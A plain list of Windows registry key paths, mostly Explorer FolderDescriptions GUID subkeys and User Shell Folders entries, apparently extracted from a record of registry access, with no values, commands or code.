HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\User Shell Folders\Common Programs
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{82A5EA35-D9CD-47C5-9629-E15D2F714E6E}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\User Shell Folders\Common Startup
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9274BD8D-CFD1-41C3-B35E-B13F55A758F4}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9274BD8D-CFD1-41C3-B35E-B13F55A758F4}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9274BD8D-CFD1-41C3-B35E-B13F55A758F4}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9274BD8D-CFD1-41C3-B35E-B13F55A758F4}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9274BD8D-CFD1-41C3-B35E-B13F55A758F4}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9274BD8D-CFD1-41C3-B35E-B13F55A758F4}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9274BD8D-CFD1-41C3-B35E-B13F55A758F4}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9274BD8D-CFD1-41C3-B35E-B13F55A758F4}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9274BD8D-CFD1-41C3-B35E-B13F55A758F4}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9274BD8D-CFD1-41C3-B35E-B13F55A758F4}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9274BD8D-CFD1-41C3-B35E-B13F55A758F4}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9274BD8D-CFD1-41C3-B35E-B13F55A758F4}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9274BD8D-CFD1-41C3-B35E-B13F55A758F4}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9274BD8D-CFD1-41C3-B35E-B13F55A758F4}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9274BD8D-CFD1-41C3-B35E-B13F55A758F4}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9274BD8D-CFD1-41C3-B35E-B13F55A758F4}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9274BD8D-CFD1-41C3-B35E-B13F55A758F4}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9274BD8D-CFD1-41C3-B35E-B13F55A758F4}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9274BD8D-CFD1-41C3-B35E-B13F55A758F4}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9274BD8D-CFD1-41C3-B35E-B13F55A758F4}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9274BD8D-CFD1-41C3-B35E-B13F55A758F4}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9274BD8D-CFD1-41C3-B35E-B13F55A758F4}\PropertyBag
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\PrintHood
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A63293E8-664E-48DB-A079-DF759E0509F7}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A63293E8-664E-48DB-A079-DF759E0509F7}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A63293E8-664E-48DB-A079-DF759E0509F7}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A63293E8-664E-48DB-A079-DF759E0509F7}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A63293E8-664E-48DB-A079-DF759E0509F7}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A63293E8-664E-48DB-A079-DF759E0509F7}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A63293E8-664E-48DB-A079-DF759E0509F7}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A63293E8-664E-48DB-A079-DF759E0509F7}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A63293E8-664E-48DB-A079-DF759E0509F7}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A63293E8-664E-48DB-A079-DF759E0509F7}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A63293E8-664E-48DB-A079-DF759E0509F7}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A63293E8-664E-48DB-A079-DF759E0509F7}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A63293E8-664E-48DB-A079-DF759E0509F7}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A63293E8-664E-48DB-A079-DF759E0509F7}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A63293E8-664E-48DB-A079-DF759E0509F7}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A63293E8-664E-48DB-A079-DF759E0509F7}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A63293E8-664E-48DB-A079-DF759E0509F7}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A63293E8-664E-48DB-A079-DF759E0509F7}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A63293E8-664E-48DB-A079-DF759E0509F7}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A63293E8-664E-48DB-A079-DF759E0509F7}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A63293E8-664E-48DB-A079-DF759E0509F7}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A63293E8-664E-48DB-A079-DF759E0509F7}\PropertyBag
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Templates
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\PropertyBag
HKEY_CLASSES_ROOT\CLSID\{BD84B380-8CA2-1069-AB1D-08000948F534}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\PropertyBag
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\NetHood
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\PropertyBag
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Start Menu
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\Description
